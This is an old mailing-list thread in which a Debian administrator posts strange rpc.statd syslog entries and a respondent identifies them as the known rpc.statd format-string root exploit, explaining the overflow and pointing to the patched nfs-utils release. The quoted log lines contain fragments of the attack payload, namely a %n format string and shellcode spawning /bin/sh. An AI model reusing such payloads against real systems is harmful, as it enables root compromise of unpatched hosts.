
Re: weird rpc.statd messages on potato



On Mon, 6 Nov 2000, Rob wrote:

> Hmm, well we're on nfs-utils (1:0.1.9.1-1), so would that mean
> that someone is trying the exploit on us? Any way to tell where
> this is coming from?

Given that you're running an up-to-date nfs-utils, they didn't get
in.  So the only info you have on them is the log messages.  So no,
there's no way to tell where it came from, unless you do some other sort
of logging (like running a packet sniffer at the time of the attack).

> BTW, what was the exploit, some kind of overflow?

Yes, it was an overflow.  Basically overflowing a format string
vulnerability when rpc.statd attempts to log to syslog(), which of
course runs as root.  More information can be found at
www.securityfocus.com by clicking on Vulnerabilities and searching for
keyword statd.

Damian

> On Mon, Nov 06, 2000 at 10:29:04PM -0600, Damian Menscher wrote:
> > On Mon, 6 Nov 2000, Rob wrote:
> > 
> > > Getting the following in our /var/log/messages
> > > 
> > > We use NFS between two Potato boxes, this appears on
> > > both :
> > > 
> > > Nov  6 08:03:19 rudy Ç^F/binÇF^D/shA0À?F^G?v^L?V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
> > > Nov  6 08:03:21 rudy 173>Nov  6 08:03:21 /sbin/rpc.statd[152]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1Àë|Y?A^P?A^HþÀ?A^D?ÃþÀ?^A°fÍ?³^B?Y^LÆA^N?ÆA^H^P?I^D?A^D^L?^A°fÍ?³^D°fÍ?³^E0À?A^D°fÍ
> > > Nov  6 08:03:21 rudy Ç^F/binÇF^D/shA0À?F^G?v^L?V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
> > 
> > Congratulations!  Assuming you haven't patched past the default install,
> > you've just been hacked!
> > 
> > This is a well-known attack on rpc.statd that was first publicized on
> > bugtraq in mid-July (you can search the archives at
> > www.securityfocus.com).  If you haven't updated your potato since then,
> > you're probably a goner.  According to the page
> > www.debian.org/security/2000/20000719a if you're running nfs-common
> > 0.1.9.1-1 or later you should be safe.  Otherwise reinstall and apt-get
> > the security updates this time.

Damian Menscher
-- 
--==## Grad. student & Sys. Admin. @ U. Illinois at Urbana-Champaign ##==--
--==## <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Ofc:(217)333-0038 ##==--
--==## Physics Dept, 1110 W Green, Urbana IL 61801 Fax:(217)333-9819 ##==--


